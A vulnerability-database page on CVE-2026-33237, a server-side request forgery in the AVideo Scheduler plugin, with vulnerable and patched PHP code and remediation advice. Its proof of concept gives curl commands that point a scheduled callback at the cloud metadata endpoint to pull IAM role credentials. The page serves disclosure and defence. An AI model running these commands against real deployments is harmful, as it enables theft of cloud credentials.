Skip to main content

PHP CVE-2026-33237

MEDIUM
Server-Side Request Forgery (SSRF) (CWE-918)
2026-03-19 https://github.com/WWBN/AVideo GHSA-v467-g7g7-hhfh
5.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.5 MEDIUM
AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 19, 2026 - 12:45 vuln.today
CVE Published
Mar 19, 2026 - 12:43 nvd
MEDIUM 5.5

DescriptionGitHub Advisory

Summary

The Scheduler plugin's run() function in plugin/Scheduler/Scheduler.php calls url_get_contents() with an admin-configurable callbackURL that is validated only by isValidURL() (URL format check). Unlike other AVideo endpoints that were recently patched for SSRF (GHSA-9x67-f2v7-63rw, GHSA-h39h-7cvg-q7j6), the Scheduler's callback URL is never passed through isSSRFSafeURL(), which blocks requests to RFC-1918 private addresses, loopback, and cloud metadata endpoints. An admin can configure a scheduled task with an internal network callbackURL to perform SSRF against cloud infrastructure metadata services or internal APIs not otherwise reachable from the internet.

Details

The vulnerable code is at plugin/Scheduler/Scheduler.php:157-166:

php
// Line 157: callback URL retrieved and site-root token substituted
$callBackURL = $e->getCallbackURL();
$callBackURL = str_replace('$SITE_ROOT_TOKEN', $global['webSiteRootURL'], $callBackURL);
if (!isValidURL($callBackURL)) {
    return false;
}
// isValidURL() only checks URL format via filter_var(..., FILTER_VALIDATE_URL)
// The critical missing check is:
// if (!isSSRFSafeURL($callBackURL)) { return false; }
if (empty($_executeSchelude[$callBackURL])) {
    $_executeSchelude[$callBackURL] = url_get_contents($callBackURL, '', 30);

isValidURL() in objects/functions.php uses filter_var($url, FILTER_VALIDATE_URL) - it validates URL syntax only and does not block internal/private network targets.

isSSRFSafeURL() in objects/functions.php:4021 explicitly blocks:

  • 127.x.x.x / ::1 (loopback)
  • 10.x.x.x, 172.16-31.x.x, 192.168.x.x (RFC-1918 private)
  • 169.254.x.x (link-local, including AWS/GCP metadata at 169.254.169.254)
  • IPv6 private ranges

This function was added to the LiveLinks proxy (GHSA-9x67-f2v7-63rw fix, commit 0e5638292) and was previously used in the aVideoEncoder download flow (GHSA-h39h-7cvg-q7j6), but the Scheduler plugin was not updated in either fix wave, leaving it as an incomplete patch.

An admin can configure the callbackURL for a scheduled task via the Scheduler plugin UI and trigger execution immediately via the "Run now" interface.

PoC

bash
# Step 1: Authenticate as admin
# Step 2: Create a scheduled task with cloud metadata SSRF callback
curl -b "admin_session=<session>" -X POST \
  https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/add.json.php \
  -d "callbackURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&status=a&type=&date_to_execute=2026-03-18+12:00:00"
# Step 3: Trigger immediate execution via Scheduler run endpoint
curl -b "admin_session=<session>" \
  https://target.avideo.site/plugin/Scheduler/run.php
# Step 4: Read the scheduler execution logs
curl -b "admin_session=<session>" \
  https://target.avideo.site/plugin/Scheduler/View/Scheduler_commands/get.json.php
# Response includes the AWS metadata API response with IAM role credentials

Expected: Internal network addresses rejected before HTTP request is made. Actual: The server makes an HTTP request to http://169.254.169.254/latest/meta-data/iam/security-credentials/ and the response (including AWS IAM role credentials) is stored in the scheduler execution log.

Impact

  • Cloud credential theft: On AWS, GCP, or Azure deployments, the attacker can retrieve IAM instance role credentials from the cloud metadata service (169.254.169.254), potentially enabling privilege escalation within the cloud environment.
  • Internal service probing: The attacker can make the server issue requests to internal APIs, microservices, or databases with HTTP interfaces not exposed to the internet.
  • Incomplete patch amplification: The fix for GHSA-9x67-f2v7-63rw and GHSA-h39h-7cvg-q7j6 added isSSRFSafeURL() to specific call sites but not the Scheduler. Deployments that updated expecting comprehensive SSRF protection remain vulnerable via this path.
  • Blast radius: Requires admin access. Impact is significant in cloud-hosted deployments where instance metadata credentials unlock broader infrastructure access.

Recommended Fix

Add isSSRFSafeURL() validation to the Scheduler callback URL before url_get_contents() is called, consistent with the existing SSRF fixes in plugin/LiveLinks/proxy.php and objects/aVideoEncoder.json.php:

php
$callBackURL = $e->getCallbackURL();
if (!isValidURL($callBackURL)) {
    return false;
}
// Add this SSRF check - same pattern as LiveLinks proxy fix (GHSA-9x67-f2v7-63rw):
if (!isSSRFSafeURL($callBackURL)) {
    _error_log("Scheduler::run SSRF protection blocked callbackURL: " . $callBackURL);
    return false;
}
if (empty($_executeSchelude[$callBackURL])) {
    $_executeSchelude[$callBackURL] = url_get_contents($callBackURL, '', 30);

AnalysisAI

The AVideo Scheduler plugin fails to validate callback URLs against Server-Side Request Forgery (SSRF) protections, allowing authenticated administrators to configure scheduled tasks that make HTTP requests to internal networks, cloud metadata services, and private IP ranges. An attacker with admin access can retrieve AWS/GCP/Azure instance metadata credentials (including IAM role tokens) or probe internal APIs not exposed to the internet. A proof-of-concept exists demonstrating credential extraction from AWS metadata endpoints at 169.254.169.254.

Technical ContextAI

The vulnerability exists in the Scheduler plugin's run() function at plugin/Scheduler/Scheduler.php:157-166, where callback URLs are validated only via isValidURL() (which checks URL format using PHP's filter_var with FILTER_VALIDATE_URL flag) but are never passed through isSSRFSafeURL(). The isSSRFSafeURL() function, defined in objects/functions.php:4021 and implemented in previous SSRF fixes (GHSA-9x67-f2v7-63rw for LiveLinks proxy and GHSA-h39h-7cvg-q7j6 for aVideoEncoder), explicitly blocks requests to RFC-1918 private ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), loopback addresses (127.0.0.1, ::1), link-local addresses (169.254.0.0/16 including cloud metadata), and IPv6 private ranges. The root cause (CWE-918: Server-Side Request Forgery) stems from incomplete input validation where format checking is conflated with security boundary enforcement. The affected product is WWBN AVideo (pkg:composer/wwbn_avideo), which is a PHP-based video platform where the Scheduler plugin is a core component.

RemediationAI

Apply the patch provided in the GitHub Security Advisory GHSA-v467-g7g7-hhfh (https://github.com/WWBN/AVideo/security/advisories/GHSA-v467-g7g7-hhfh), which adds isSSRFSafeURL() validation to plugin/Scheduler/Scheduler.php before the url_get_contents() call, consistent with the prior fixes in LiveLinks proxy and aVideoEncoder. The exact patch pattern recommended is: add a guard check 'if (!isSSRFSafeURL($callBackURL)) { _error_log(...); return false; }' immediately after the isValidURL() check and before url_get_contents() is invoked. Until patching, temporarily disable the Scheduler plugin or restrict admin role membership to trusted personnel only and audit existing scheduled tasks for internal IP addresses (use grep or database queries to inspect callbackURL fields in the scheduler configuration table). Implement network segmentation to block outbound HTTP/HTTPS from the AVideo server to private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.0.0/16) at the firewall level as a compensating control.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33237 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy